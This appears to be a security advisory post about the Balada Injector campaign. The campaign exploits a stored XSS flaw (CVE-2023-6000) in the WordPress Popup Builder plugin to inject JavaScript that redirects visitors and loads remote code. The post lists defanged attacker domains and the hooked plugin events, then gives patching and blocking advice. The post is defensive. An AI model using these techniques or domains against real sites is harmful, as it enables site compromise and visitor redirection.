Balada Injector malware campaign
Bhumi iTech
Rangestorm, a Comprehensive, Hands-on and Practical cybersecurity training platform used by learners
In recent times, a significant threat has emerged within the realm of WordPress websites in the form of the Balada Injector malware campaign. The Balada Injector campaign has a vulnerability in the Popup Builder WordPress plugin. Initially disclosed by security researcher Marc Montpas in November 2023. This campaign exploits vulnerabilities present in the widely-used WordPress Popup Builder plugin, resulting in the compromise of numerous websites. The flaw leveraged in the attacks is tracked as CVE-2023-6000, a cross-site scripting (XSS) vulnerability impacting Popup Builder versions 4.2.3 and older, which was initially disclosed in November 2023, this vulnerability has since become a focal point for cybercriminals seeking to exploit WordPress sites.
Methodology
A Balada Injector campaign uncovered at the start of the year exploited the particular vulnerability to infect over 6,700 websites
Affected Version
New Malware Campaign Found Exploiting Stored XSS in Popup Builder < 4.2.3
Indicators of Compromise
The attackers capitalize on a known vulnerability within the Popup Builder WordPress plugin, enabling them to inject malicious code into the Custom JS or CSS section of the WordPress admin interface.?
This injected code, stored internally in the wp_postmeta database table, manifests in two variations across infected websites.
Primarily, the injected code serves as event handlers for a spectrum of Popup Builder plugin events, including 'sgpb-ShouldOpen', 'sgpb-ShouldClose', 'sgpb-WillOpen', 'sgpbDidOpen', 'sgpbWillClose', and 'sgpb-DidClose'. Through this mechanism, the malicious code executes specific actions of the plugin, particularly when popups open or close.
领英推荐
Certain iterations of the injected code incorporate the "hxxp://ttincoming.traveltraffic[.]cc/?traffic" URL as the redirect-url parameter for 'contact-form-7' popups.
Practically, the attackers can achieve a range of malicious goals through this method, many potentially being more severe than redirections.?
The injection process retrieves the malicious code snippet from an external source and seamlessly embeds it into the webpage head, facilitating execution by the browser. This approach presents attackers with a myriad of malicious objectives, potentially surpassing mere redirections in severity.
Defensive Measures
1) Defending against Balada Injection attacks requires WordPress site admins to update themes and plugins to their latest version, and uninstall products that are no longer supported or needed on the website.
2) Keeping on a WordPress site as small as several active plugins as possible reduces the attack surface and minimizes the risk of breaches from automated scripts.
3) The attacks originate from the domains "ttincoming.traveltraffic[.]cc" and "host.cloudsonicwave[.]com," so blocking these two is recommended.
To defend against Balada Injection attacks, WordPress site admins are advised to update themes and plugins to their latest versions promptly. Additionally, uninstalling unsupported or unnecessary plugins helps reduce the attack surface and minimizes the risk of breaches